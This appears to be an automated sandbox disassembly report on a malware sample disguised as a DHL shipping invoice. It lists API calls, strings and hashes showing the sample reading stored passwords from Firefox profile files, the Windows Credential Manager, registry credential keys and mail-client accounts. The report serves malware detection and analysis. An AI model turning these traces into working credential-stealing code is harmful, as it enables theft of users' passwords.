                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                                      • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                                      • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                                                                                                                                                      • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                                      • String ID: salu
                                                                                                                                                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                                      • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2449869053-232097475
                                                                                                                                                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                                                                                      • API String ID: 551151806-1288872324
                                                                                                                                                                                                                                      • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                                      • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                                      • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410171
